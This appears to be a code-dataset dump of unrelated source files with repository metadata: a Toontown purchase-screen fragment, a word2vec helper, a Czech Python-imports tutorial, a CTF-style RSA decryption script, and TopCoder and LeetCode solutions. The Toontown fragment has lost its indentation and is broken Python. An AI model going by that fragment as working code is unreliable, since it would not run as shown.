self.voteMultiplier = TravelGameGlobals.PercentOfVotesConverted[numToons] / 100.0
self.maxBeansFromVotes = int(self.voteMultiplier * self.maxVotes)
else:
self.maxVotes = 0
self.maxBeansFromVotes = 0
def reqCountUp(state):
self.countUp()
return Task.done
countUpDelay = DELAY_BEFORE_COUNT_UP
taskMgr.doMethodLater(countUpDelay, reqCountUp, 'countUpTask')
def reqCountDown(state):
self.countDown()
return Task.done
countDownDelay = countUpDelay + COUNT_UP_DURATION + DELAY_AFTER_COUNT_UP
taskMgr.doMethodLater(countDownDelay, reqCountDown, 'countDownTask')
def celebrate(task):
for counter in task.counters:
counter.hide()
winningPoints = max(task.pointsArray)
for i in xrange(len(task.ids)):
if task.pointsArray[i] == winningPoints:
avId = task.ids[i]
if base.cr.doId2do.has_key(avId):
toon = base.cr.doId2do[avId]
toon.setAnimState('jump', 1.0)
base.playSfx(task.celebrateSound)
return Task.done
celebrateDelay = countDownDelay + COUNT_DOWN_DURATION + DELAY_AFTER_COUNT_DOWN
celebrateTask = taskMgr.doMethodLater(celebrateDelay, celebrate, 'celebrate')
celebrateTask.counters = self.counters
celebrateTask.pointsArray = self.pointsArray
celebrateTask.ids = self.ids
celebrateTask.celebrateSound = self.celebrateSound
def reqCountVotesUp(state):
self.countVotesUp()
return Task.done
def reqCountVotesDown(state):
self.countVotesDown()
return Task.done
if self.metagameRound == TravelGameGlobals.FinalMetagameRoundIndex:
countVotesUpDelay = celebrateDelay + DELAY_AFTER_CELEBRATE
taskMgr.doMethodLater(countVotesUpDelay, reqCountVotesUp, 'countVotesUpTask')
countVotesUpTime = self.maxVotes * COUNT_UP_RATE + DELAY_AFTER_COUNT_UP
countVotesDownDelay = countVotesUpDelay + countVotesUpTime
taskMgr.doMethodLater(countVotesDownDelay, reqCountVotesDown, 'countVotesDownTask')
celebrateDelay += countVotesUpTime + self.maxVotes * COUNT_DOWN_RATE + DELAY_AFTER_COUNT_DOWN
def reqPurchase(state):
self.fsm.request('purchase')
return Task.done
purchaseDelay = celebrateDelay + DELAY_AFTER_CELEBRATE
taskMgr.doMethodLater(purchaseDelay, reqPurchase, 'purchase-trans')
if base.skipMinigameReward:
self.fsm.request('purchase')
return
def _changeCounterUp(self, task, counter, newCount, toonId):
counter.count = newCount
counter['text'] = str(counter.count)
if toonId == base.localAvatar.doId:
now = globalClock.getRealTime()
if task.lastSfxT + COUNT_SFX_MIN_DELAY < now:
base.playSfx(task.countSound, time=COUNT_SFX_START_T)
task.lastSfxT = now
def _countUpTask(self, task):
now = globalClock.getRealTime()
startT = task.getStartTime()
if now >= startT + task.duration:
for counter, toonId in zip(self.counters, self.ids):
if counter.count != counter.max:
self._changeCounterUp(task, counter, counter.max, toonId)
return Task.done
t = (now - startT) / task.duration
for counter, toonId in zip(self.counters, self.ids):
curCount = int(t * counter.max)
if curCount != counter.count:
self._changeCounterUp(task, counter, curCount, toonId)
return Task.cont
def countUp(self):
totalDelay = 0
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY) or base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY_MONTH):
self.rewardDoubledJellybeanLabel.show()
countUpTask = taskMgr.add(self._countUpTask, 'countUp')
countUpTask.duration = COUNT_UP_DURATION
countUpTask.countSound = self.countSound
countUpTask.lastSfxT = 0
def _changeCounterDown(self, task, counter, newCount, total, toonId):
counter.count = newCount
counter['text'] = str(counter.count)
total.count = total.startAmount + (counter.max - newCount)
if total.count > total.max:
total.count = total.max
total['text'] = str(total.count)
if total.count == total.max:
total['text_fg'] = (1, 0, 0, 1)
if toonId == base.localAvatar.doId:
now = globalClock.getRealTime()
if total.count < total.max:
minDelay = COUNT_SFX_MIN_DELAY
snd = task.countSound
startT = COUNT_SFX_START_T
else:
minDelay = OVERMAX_SFX_MIN_DELAY
snd = task.overMaxSound
startT = OVERMAX_SFX_START_T
if task.lastSfxT + minDelay < now:
task.lastSfxT = now
base.playSfx(snd, time=startT)
def _countDownTask(self, task):
now = globalClock.getRealTime()
startT = task.getStartTime()
if now >= startT + task.duration:
for counter, total, toonId in zip(self.counters, self.totalCounters, self.ids):
if counter.count != 0:
self._changeCounterDown(task, counter, 0, total, toonId)
return Task.done
t = (now - startT) / task.duration
for counter, total, toonId in zip(self.counters, self.totalCounters, self.ids):
curCount = int(counter.max * (1 - t))
if curCount != counter.count:
self._changeCounterDown(task, counter, curCount, total, toonId)
return Task.cont
def countDown(self):
totalDelay = 0
for total in self.totalCounters:
total.startAmount = total.count
countDownTask = taskMgr.add(self._countDownTask, 'countDown')
countDownTask.duration = COUNT_DOWN_DURATION
countDownTask.countSound = self.countSound
countDownTask.overMaxSound = self.overMaxSound
countDownTask.lastSfxT = 0
def countVotesUp(self):
totalDelay = 0
self.convertingVotesToBeansLabel.show()
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY) or base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY_MONTH):
self.rewardDoubledJellybeanLabel.show()
counterIndex = 0
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE and avId in base.cr.doId2do:
self.counters[counterIndex].count = 0
self.counters[counterIndex].max = self.votesArray[index]
self.counters[counterIndex].show()
counterIndex += 1
def delayAdd(state):
state.counter.count += 1
state.counter['text'] = str(state.counter.count)
if state.toonId == base.localAvatar.doId:
base.playSfx(state.countSound)
return Task.done
for count in xrange(0, self.maxVotes):
for counter in self.counters:
index = self.counters.index(counter)
if count < counter.max:
addTask = taskMgr.doMethodLater(totalDelay, delayAdd, 'delayAdd')
addTask.counter = counter
addTask.toonId = self.ids[index]
addTask.countSound = self.countSound
totalDelay += COUNT_UP_RATE
def countVotesDown(self):
totalDelay = 0
def delaySubtract(state):
state.counter.count -= 1
state.counter['text'] = str(state.counter.count)
state.total.count += 1 * self.voteMultiplier
if state.total.count <= state.total.max:
state.total['text'] = str(int(state.total.count))
if state.total.count == state.total.max + 1:
state.total['text_fg'] = (1, 0, 0, 1)
if state.toonId == base.localAvatar.doId:
if state.total.count <= state.total.max:
base.playSfx(state.countSound)
else:
base.playSfx(state.overMaxSound)
return Task.done
for count in xrange(0, self.maxVotes):
for counter in self.counters:
if count < counter.max:
index = self.counters.index(counter)
subtractTask = taskMgr.doMethodLater(totalDelay, delaySubtract, 'delaySubtract')
subtractTask.counter = counter
subtractTask.total = self.totalCounters[index]
subtractTask.toonId = self.ids[index]
subtractTask.countSound = self.countSound
subtractTask.overMaxSound = self.overMaxSound
totalDelay += COUNT_DOWN_RATE
def exitReward(self):
self.ignore('clientCleanup')
taskMgr.remove('countUpTask')
taskMgr.remove('countVotesUpTask')
taskMgr.remove('countDownTask')
taskMgr.remove('countVotesDownTask')
taskMgr.remove('celebrate')
taskMgr.remove('purchase-trans')
taskMgr.remove('delayAdd')
taskMgr.remove('delaySubtract')
for toon in self.toons:
toon.detachNode()
del self.toons
if hasattr(self, 'toonsKeep'):
for delayDelete in self.toonsKeep:
delayDelete.destroy()
del self.toonsKeep
for counter in self.counters:
counter.reparentTo(hidden)
for total in self.totalCounters:
total.reparentTo(hidden)
self.foreground.reparentTo(hidden)
self.backgroundL.reparentTo(hidden)
self.backgroundR.reparentTo(hidden)
self.sidewalk.reparentTo(hidden)
self.sidewalkL.reparentTo(hidden)
self.sidewalkR.reparentTo(hidden)
self.door.reparentTo(hidden)
self.title.reparentTo(self.frame)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel.hide()
base.camLens.setMinFov(ToontownGlobals.DefaultCameraFov/(4./3.))
NametagGlobals.setOnscreenChatForced(0)
def _handleClientCleanup(self):
if hasattr(self, 'toonsKeep'):
for delayDelete in self.toonsKeep:
delayDelete.destroy()
del self.toonsKeep
self.ignore('clientCleanup')
def enterPurchase(self):
PurchaseBase.enterPurchase(self)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel.hide()
self.bg.reparentTo(render)
base.setBackgroundColor(0.78, 0.65, 0.53)
self.accept('purchaseStateChange', self.__handleStateChange)
self.playAgain.reparentTo(self.toon.inventory.purchaseFrame)
self.backToPlayground.reparentTo(self.toon.inventory.purchaseFrame)
self.pointDisplay.reparentTo(self.toon.inventory.purchaseFrame)
self.statusLabel.reparentTo(self.toon.inventory.purchaseFrame)
for headFrame in self.headFrames:
headFrame[1].show()
headFrame[1].reparentTo(self.toon.inventory.purchaseFrame)
if base.cr.periodTimerExpired:
base.cr.loginFSM.request('periodTimeout')
return
if not self.tutorialMode:
if not config.GetBool('disable-purchase-timer', 0):
self.timer.show()
self.timer.countdown(self.remain, self.__timerExpired)
if config.GetBool('metagame-disable-playAgain', 0):
if self.metagameRound > -1:
self.disablePlayAgain()
else:
self.timer.hide()
self.disablePlayAgain()
self.accept('disableGagPanel', Functor(self.toon.inventory.setActivateMode, 'gagTutDisabled', gagTutMode=1))
self.accept('disableBackToPlayground', self.disableBackToPlayground)
self.accept('enableGagPanel', self.handleEnableGagPanel)
self.accept('enableBackToPlayground', self.enableBackToPlayground)
for avId, headFrame in self.headFrames:
if avId != self.newbieId:
headFrame.hide()
messenger.send('gagScreenIsUp')
if base.autoPlayAgain or self.doMetagamePlayAgain():
base.transitions.fadeOut(0)
self.__handlePlayAgain()
def exitPurchase(self):
PurchaseBase.exitPurchase(self)
self.ignore('disableGagPanel')
self.ignore('disableBackToPlayground')
self.ignore('enableGagPanel')
self.ignore('enableBackToPlayground')
self.bg.reparentTo(hidden)
self.playAgain.reparentTo(self.frame)
self.backToPlayground.reparentTo(self.frame)
self.pointDisplay.reparentTo(self.frame)
self.statusLabel.reparentTo(self.frame)
self.ignore('purchaseStateChange')
base.setBackgroundColor(ToontownGlobals.DefaultBackgroundColor)
if base.autoPlayAgain or self.doMetagamePlayAgain():
base.transitions.fadeIn()
def disableBackToPlayground(self):
self.backToPlayground['state'] = DGG.DISABLED
def enableBackToPlayground(self):
self.backToPlayground['state'] = DGG.NORMAL
def disablePlayAgain(self):
self.playAgain['state'] = DGG.DISABLED
def enablePlayAgain(self):
self.playAgain['state'] = DGG.NORMAL
def enterTutorialMode(self, newbieId):
self.tutorialMode = 1
self.newbieId = newbieId
def handleEnableGagPanel(self):
self.toon.inventory.setActivateMode('purchase', gagTutMode=1)
self.checkForBroke()
def handleGagTutorialDone(self):
self.enableBackToPlayground()
def doMetagamePlayAgain(self):
if hasattr(self, 'metagamePlayAgainResult'):
return self.metagamePlayAgainResult
numToons = 0
for avId in self.ids:
            if avId in base.cr.doId2do and avId not in self.unexpectedExits:
numToons += 1
self.metagamePlayAgainResult = False
if numToons > 1:
if self.metagameRound > -1 and self.metagameRound < TravelGameGlobals.FinalMetagameRoundIndex:
self.metagamePlayAgainResult = True
return self.metagamePlayAgainResult
def setupUnexpectedExitHooks(self):
for avId in self.ids:
            if avId in base.cr.doId2do:
toon = base.cr.doId2do[avId]
eventName = toon.uniqueName('disable')
self.accept(eventName, self.__handleUnexpectedExit, extraArgs=[avId])
self.unexpectedEventNames.append(eventName)
def cleanupUnexpectedExitHooks(self):
for eventName in self.unexpectedEventNames:
self.ignore(eventName)
def __handleUnexpectedExit(self, avId):
self.unexpectedExits.append(avId)
class PurchaseHeadFrame(DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('Purchase')
def __init__(self, av, purchaseModels):
DirectFrame.__init__(self, relief=None, image=purchaseModels.find('**/Char_Pnl'))
self.initialiseoptions(PurchaseHeadFrame)
self.statusLabel = DirectLabel(parent=self, relief=None, text='', text_scale=TTLocalizer.PstatusLabel, text_wordwrap=7.5, text_fg=(0.05, 0.14, 0.4, 1), text_pos=(0.1, 0, 0))
self.av = av
self.avKeep = DelayDelete.DelayDelete(av, 'PurchaseHeadFrame.av')
self.accept('clientCleanup', self._handleClientCleanup)
self.head = self.stateNodePath[0].attachNewNode('head', 20)
self.head.setPosHprScale(-0.22, 10.0, -0.1, 180.0, 0.0, 0.0, 0.1, 0.1, 0.1)
self.headModel = ToonHead.ToonHead()
self.headModel.setupHead(self.av.style, forGui=1)
self.headModel.reparentTo(self.head)
self.tag2Node = NametagFloat2d()
self.tag2Node.setContents(Nametag.CName)
self.av.nametag.addNametag(self.tag2Node)
self.tag2 = self.attachNewNode(self.tag2Node)
self.tag2.setPosHprScale(-0.22, 10.0, 0.12, 0, 0, 0, 0.046, 0.046, 0.046)
self.tag1Node = NametagFloat2d()
self.tag1Node.setContents(Nametag.CSpeech | Nametag.CThought)
self.av.nametag.addNametag(self.tag1Node)
self.tag1 = self.attachNewNode(self.tag1Node)
self.tag1.setPosHprScale(-0.15, 0, -0.1, 0, 0, 0, 0.046, 0.046, 0.046)
self.hide()
return
def destroy(self):
DirectFrame.destroy(self)
del self.statusLabel
self.headModel.delete()
del self.headModel
self.head.removeNode()
del self.head
self.av.nametag.removeNametag(self.tag1Node)
self.av.nametag.removeNametag(self.tag2Node)
self.tag1.removeNode()
self.tag2.removeNode()
del self.tag1
del self.tag2
del self.tag1Node
del self.tag2Node
del self.av
self.removeAvKeep()
def setAvatarState(self, state):
if state == PURCHASE_DISCONNECTED_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerDisconnected % self.av.getName()
self.statusLabel['text_pos'] = (0.015, 0.072, 0)
self.head.hide()
self.tag1.hide()
self.tag2.hide()
elif state == PURCHASE_EXIT_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerExited % self.av.getName()
self.statusLabel['text_pos'] = (0.015, 0.072, 0)
self.head.hide()
self.tag1.hide()
self.tag2.hide()
elif state == PURCHASE_PLAYAGAIN_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerPlayAgain
self.statusLabel['text_pos'] = (0.1, -0.12, 0)
elif state == PURCHASE_WAITING_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerBuying
self.statusLabel['text_pos'] = (0.1, -0.12, 0)
elif state == PURCHASE_NO_CLIENT_STATE:
Purchase.notify.warning("setAvatarState('no client state'); OK for gag purchase tutorial")
else:
Purchase.notify.warning('unknown avatar state: %s' % state)
def _handleClientCleanup(self):
self.destroy()
def removeAvKeep(self):
if hasattr(self, 'avKeep'):
self.notify.debug('destroying avKeep %s' % self.avKeep)
self.avKeep.destroy()
del self.avKeep
self.ignore('clientCleanup')
|
[
"sweep14@gmail.com"
] |
sweep14@gmail.com
|
a3e6957192f7ca7843ec9b6000732e55ff189c70
|
937a4684691447ee3848043626f73b7ec8e22e25
|
/app/embeddings/word2vecs.py
|
0ba46648b36b2ee47b5bfab8da8b187784ff682c
|
[] |
no_license
|
PCS0725/opanalyzer-backend
|
b96e7d8f17ba4858fab96fe720b7838cf9c7ef03
|
156603c2a22cf991ffc1df20d9ee87c3ed2dae09
|
refs/heads/main
| 2023-03-21T02:37:30.944025
| 2021-03-07T06:10:46
| 2021-03-07T06:10:46
| 343,015,953
| 1
| 0
| null | 2021-03-07T06:10:47
| 2021-02-28T03:58:41
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from app.config import WORD2VEC_MODEL
import pandas as pd
import gensim
from gensim.models import Word2Vec
import pickle
class Word2Vecs:
def getEmbeddings(self, df):
glove_vectors = pickle.load(open(WORD2VEC_MODEL, 'rb'))
X = []
for row in df.clean:
sent = []
lst = row.strip('][').split(', ')
for word in lst:
wd = word.replace("'", "")
if(wd in glove_vectors.vocab):
vec = glove_vectors[wd]
sent.append(round(sum(vec)/len(vec), 5))
else:
sent.append(0)
X.append(sent)
embeds_df = pd.DataFrame(X)
embeds_df['sentiment'] = df['sentiment']
return embeds_df
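# A minimal usage sketch (hypothetical data; assumes WORD2VEC_MODEL points at a
# pickled gensim KeyedVectors object, as getEmbeddings above expects):
#
#   df = pd.DataFrame({'clean': ["['good', 'movie']"], 'sentiment': [1]})
#   embeds = Word2Vecs().getEmbeddings(df)
#   print(embeds.head())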
|
[
"prabbhat25199@gmail.com"
] |
prabbhat25199@gmail.com
|
815e2a00511f0d60f1475f816c1caf77ed92aa6e
|
99e3805c58d7f0a341ef2a780422307e6f30ad22
|
/01-basics/imports.py
|
2e08de9963523e87b3f1081f53d45b119944e6e4
|
[] |
no_license
|
WitchoutName/Python
|
8c488a7755aa888e4d5a91bfca575500f9209276
|
2dbc0cd8ea4c621a941ecff5abd010ae88ef53c6
|
refs/heads/main
| 2023-01-30T05:20:22.007636
| 2020-11-24T10:39:13
| 2020-11-24T10:39:13
| 302,704,739
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,496
|
py
|
'''
Importing modules in Python
Larger programs should be split into separate modules.
A module is a file containing Python definitions and statements.
Python modules live in separate files with the .py extension.
Definitions inside a module can be imported into other modules or into the interactive Python console.
Modules are attached with the import keyword.
'''
'''
Example of importing the math module. Here the dot operator gives us access to all the attributes and functions
that the math module offers.
'''
import math
print(math.pi)
print('Trigonometric functions: sin 45° = {}, cos 45° = {}'.format(math.sin(45), math.cos(45)))  # note: math.sin/math.cos take radians, so 45 here means 45 radians, not 45°
'''
Example of importing the sys module and one of its attributes, path. We use the construct:
from module_name import attribute_name
'''
#from sys import path
#print(path) # Prints the list of directory paths the application uses
'''
The math and sys modules are internal modules that ship with the standard Python installation.
External modules are distributed as packages and must be installed with the pip tool:
pip install <package_name>
A package can be uninstalled with:
pip uninstall <package_name>
When using a virtual environment, installed packages are stored in that environment's directory
(in our case venv) under the Lib and site-packages subfolders.
A list of all installed packages is printed by:
pip list
We can also create a requirements.txt file recording all of the application's so-called dependencies - that is,
information about every package that must be installed into the virtual environment for the application to work.
The requirements.txt file is created with:
pip freeze > requirements.txt
More detailed information about an installed package is shown by:
pip show <package_name>
All dependencies recorded in requirements.txt are installed automatically with:
pip install -r requirements.txt
'''
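# A minimal requirements.txt produced by pip freeze might look like this
# (the version numbers are illustrative, not prescriptive):
#
#   camelcase==0.2
#   python-dateutil==2.8.2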
# In the virtual environment console, install the external package camelcase
# (venv) E:\python\projekt\venv>pip install camelcase
# Then import the package
import camelcase
c = camelcase.CamelCase() # The CamelCase() constructor creates an object in the variable c
txt = 'hello world'
print(c.hump(txt)) # The hump() method reformats the given string according to camel-case rules (capitalizes the first letter of each word)
"""
Cvičení 4:
Použijte vhodné moduly v Pythonu (včetně jejich případné instalace) k tomu, abyste:
1) vypsali aktuální datum a čas
2) vypsali datum velikonoční neděle (easter) v následujících 5 letech
3) vypsali nejbližší rok, v němž bude Štědrý den v neděli
K řešení prvního úkolu je možné doporučit importovat interní modul datetime
Řešení dalších dvou úkolů můžete odvodit z příkladů v dokumentaci k externímu modulu dateutil - viz https://pypi.org/project/python-dateutil/
"""
from dateutil import easter
from dateutil.rrule import *
from datetime import *
from dateutil.relativedelta import *
from dateutil.parser import *
print(f"date {datetime.now()}")
for year in range(2021, 2026):
print(f"easter {easter.easter(year)}")
print(f"{rrule(YEARLY, bymonth=12, bymonthday=24, byweekday=SU).after(datetime.now())}")
|
[
"noreply@github.com"
] |
WitchoutName.noreply@github.com
|
7feb66b409ad0fe39a9c6b5db78af52698879c16
|
b64425872561b609e9c450bb015e85419d1923c6
|
/day-02/part-2/jules.py
|
4c90ae39bff1dade9d33ca5eca6ea5fdcec366f1
|
[
"MIT"
] |
permissive
|
lypnol/adventofcode-2017
|
4c58fa735b99d197fc4bba974422dd034cba01d1
|
03ced3df3eb80e5c7965c4120e3932919067cb15
|
refs/heads/master
| 2021-05-06T19:19:21.815272
| 2018-03-25T20:05:07
| 2018-03-25T20:05:07
| 112,111,717
| 16
| 4
|
MIT
| 2019-10-04T08:55:19
| 2017-11-26T19:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 698
|
py
|
from submission import Submission
class JulesSubmission(Submission):
def run(self, s):
# :param s: input in string format
# :return: solution flag
# your solution code goes here
def find_for_row(row):
for fi in range(len(row)):
for si in range(fi + 1, len(row)):
if row[fi] > row[si] and row[fi] % row[si] == 0:
return int(row[fi] / row[si])
elif row[si] % row[fi] == 0:
return int(row[si] / row[fi])
row_list = [[int(x) for x in row.split()] for row in s.split('\n')]
return str(sum([find_for_row(row) for row in row_list]))
|
[
"jules.denardou@datadoghq.com"
] |
jules.denardou@datadoghq.com
|
7152195962e61a7ae20ea2ef463bfc2c5290927a
|
4ec1b366bb46e747d9b82f648bfa931d13943939
|
/pico.py
|
beab3d4d6f6220eb71353e9e8bd5f99cfa3a7a79
|
[] |
no_license
|
Random-Person2552/pythonBackup
|
b59e6b414c824cf9bfe31ffb8a1e410b6158b5a2
|
273fdcbf991b28e6392765e5646fc9871169f435
|
refs/heads/master
| 2020-05-29T10:49:52.754539
| 2019-05-28T21:10:47
| 2019-05-28T21:10:47
| 189,103,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,809
|
py
|
import math
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
def gcd(a, b):
if (a == 0):
return b
return gcd(b % a, a)
def phi(n):
result = 1
for i in range(2, n):
if (gcd(i, n) == 1):
result+=1
return result
def phi_two(q, p):
q = q -1
p = p -1
return q * p
def iroot(k, n):
u, s = n, n+1
while u < s:
s = u
t = (k-1) * s + n // pow(s, k-1)
u = t // k
return s
n = 13560417960801296839882552449418731731399677948669445254256179042180371513049687
#p = 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433
#q = n / p
e = 65537
#phi = phi(n)
c = 11979998127328309483755159511700985576751434399944560644272745062116136412266657
#d = 11249620277260260736493499765360743175678915580377635061547739419630203072966392
d = modinv(e, n)
print d
# pasted output of the print above:
# 1021317628866569678214494683807765890552004323556950987312904254273855967240404229687321920774113531353309058801650117748282449429534527831526726955433537842422750995408367392389615393138286228321608610204291980950474688151965286170998997753025612993603377505346459549402364940463071518321965380953981837
#print n
#x = 2205316413931134031046440767620541984801091216351222789180593875373829950860542792110364325728088504479780803714561464250589795961097670884274813261496112882580892020487261058118157619586156815531561455215290361274334977137261636930849125 ** 3
#print x
#print x % n
# D = 232090017039379620941582149411005346720036016154747258099258175670240275266053377370543133895187036673098124917725486421794871894564257182887949472012324016772235997598559829941232312281741562756820071589674847373169652725135709705123641203225818305899493434046795277007635702859705572766056279941829066
#print iroot(2205316413931134031046440767620541984801091216351222789180593875373829950860542792110364325728088504479780803714561464250589795961097670884274813261496112882580892020487261058118157619586156815531561455215290361274334977137261636930849125, 3)
# pasted output, apparently from the commented-out iroot call above:
# 893887504690392820638378600918539954071845726463729762686245696712627201749694290077771929641267193945315897516888792007230598938351307761934133296592682621582943313237044410930385231617635012267813760389313823757777109307359237333810027313775778518681000801371850487907636740634637542666575900080961590
|
[
"jared@overwatchdmc.com"
] |
jared@overwatchdmc.com
|
0a6cdefe90e54b7d2c191e658e94a130c0d8e36b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_373/ch52_2020_04_29_18_16_04_599137.py
|
0122d8cd2bdc4fe457101602678522d016aa8163
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
x=[]
y=[]
def calcula_total_da_nota (x,y,i):
t= x[i]* y[i]
return t
|
[
"you@example.com"
] |
you@example.com
|
74fd3e01423e3b6dfd17bab74791ab088d301a07
|
8986bd27f551aaf90da92ea9906a5d5a000f1508
|
/TopCoder-Solutions/SRM's/AlienAndPassword.py
|
78c4d95a6e914187ddbb3facb788772566e43ad9
|
[] |
no_license
|
siddeshshewde/Competitive-Programming
|
bb5a9aa82136a7e976b00d7f6087b96a7f7cda55
|
5b525ebfdc4fc57ab1296c9f491221fc34f636bf
|
refs/heads/master
| 2020-05-29T19:42:06.020432
| 2020-04-05T15:15:37
| 2020-04-05T15:15:37
| 83,057,075
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,263
|
py
|
# Problem : AlienAndPassword
# Used In : SRM 605
# Date : 01.21.2014
# Category : Brute Force, String Manipulation
# Division : 2
# Level : 1
# Round : 1
# Points : 250
# Difficulty : Easy
# Problem Type : Single
# Description : https://community.topcoder.com/stat?c=problem_statement&pm=12950
# Class Name : AlienAndPassword
# Method Name : getNumber
# Return Type : Int
# Arg Types : String
"""
## Problem Statement
Alien Fred wants to destroy the Earth, but he forgot the password that activates the planet destroyer.
You are given a String S. Fred remembers that the correct password can be obtained from S by erasing exactly one character.
Return the number of different passwords Fred needs to try.
## Definition
Class: AlienAndPassword
Method: getNumber
Parameters: String
Returns: int
Method signature: int getNumber(String S)
(be sure your method is public)
## Limits
Time limit (s): 840.000
Memory limit (MB): 64
## Constraints
- S will contain between 1 and 50 characters, inclusive.
- Each character in S will be an uppercase English letter ('A'-'Z').
## Examples
"A"
Returns: 1
In this case, the only password Fred needs to try is an empty string.
"ABA"
Returns: 3
The following three passwords are possible in this case: "BA", "AA", "AB".
"AABACCCCABAA"
Returns: 7
"AGAAGAHHHHFTQLLAPUURQQRRRUFJJSBSZVJZZZ"
Returns: 26
"ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
Returns: 1
Regardless of which character we erase, we will always obtain the same string. Thus there is only one possible password: the string that consists of 49 'Z's.
**This problem statement is the exclusive and proprietary property of TopCoder, Inc. Any unauthorized use or reproduction of this information
without the prior written consent of TopCoder, Inc. is strictly prohibited. (c)2003, TopCoder, Inc. All rights reserved.**
"""
#Solution
class AlienAndPassword:
def getNumber(self, s):
n = 1
for i in range (1, len(s)):
if s[i] != s[i-1]:
n = n+1
return n
# Points Received - 249.89
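# A quick sanity check against the examples in the statement (hypothetical
# driver; the TopCoder harness normally calls getNumber directly):
if __name__ == '__main__':
    solver = AlienAndPassword()
    assert solver.getNumber('A') == 1
    assert solver.getNumber('ABA') == 3
    assert solver.getNumber('AABACCCCABAA') == 7
    assert solver.getNumber('Z' * 50) == 1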
|
[
"noreply@github.com"
] |
siddeshshewde.noreply@github.com
|
b226c2d3f5ac9b814e1f40847f21c0c0929005d6
|
f2a2f41641eb56a17009294ff100dc9b39cb774b
|
/current_session/python/2136.py
|
85d10060df53dffdce504322686c01c2cfa25b8e
|
[] |
no_license
|
YJL33/LeetCode
|
0e837a419d11d44239d1a692140a1468f6a7d9bf
|
b4da922c4e8406c486760639b71e3ec50283ca43
|
refs/heads/master
| 2022-08-13T01:46:14.976758
| 2022-07-24T03:59:52
| 2022-07-24T04:11:32
| 52,939,733
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from typing import List
class Solution:
def earliestFullBloom(self, plantTime: List[int], growTime: List[int]) -> int:
# sort based on grow Time
gt = []
for i in range(len(growTime)):
gt.append((growTime[i], i))
gt.sort(reverse=True)
total_plant_time = sum(plantTime)
bloom_days = []
for t, i in gt:
total_plant_time -= plantTime[i]
bloom_days.append(total_plant_time-t)
return sum(plantTime)-min(bloom_days)
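# Greedy rationale: seeds with the longest grow times are planted first so their
# growth overlaps the remaining planting work; the answer is the latest bloom day.
# Sanity check against LeetCode 2136's first example:
#   Solution().earliestFullBloom([1, 4, 3], [2, 3, 1])  # -> 9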
|
[
"yunjun.l33@gmail.com"
] |
yunjun.l33@gmail.com
|
786942c01ede93b705ab7b420dcbbaad7effe584
|
1dfeaa55dbd04dec8413657db1f636365d5af893
|
/venv/Scripts/easy_install-script.py
|
72a0acb135552e3161137bbe29363c060d2687e4
|
[] |
no_license
|
ghassenjebari/Contact
|
836baf50ff5dc54f667e38aab315e61bd2bf2c31
|
c0f7e29684e21123c0206b6fa39996b2002ad163
|
refs/heads/master
| 2022-10-03T04:58:16.310055
| 2020-06-05T10:38:30
| 2020-06-05T10:38:30
| 268,900,567
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
#!C:\Users\ghassen\PycharmProjects\repertoire\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"ghassenjebari@users.noreply.github.com"
] |
ghassenjebari@users.noreply.github.com
|
3d03ca482cac616f4050c2adbe75fbcc17b9aceb
|
1e08e5b65868bdae9616ca940f233a4309502410
|
/neo4s/bin/neo4j/time/arithmetic.py
|
67028e43e9fa2459f3d5cebfffab18bf328b57e4
|
[
"Apache-2.0"
] |
permissive
|
omerl13/neo4s
|
7424db9f5b455a8322f13a0b4c4a99cf54acf839
|
5471818838099310a153d2c0844cc3c0f1943b79
|
refs/heads/master
| 2023-05-28T14:31:42.259182
| 2020-07-24T09:44:46
| 2020-07-24T09:44:46
| 121,294,087
| 2
| 5
|
Apache-2.0
| 2023-05-12T14:10:23
| 2018-02-12T19:51:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,038
|
py
|
#!/usr/bin/env python
# coding: utf-8
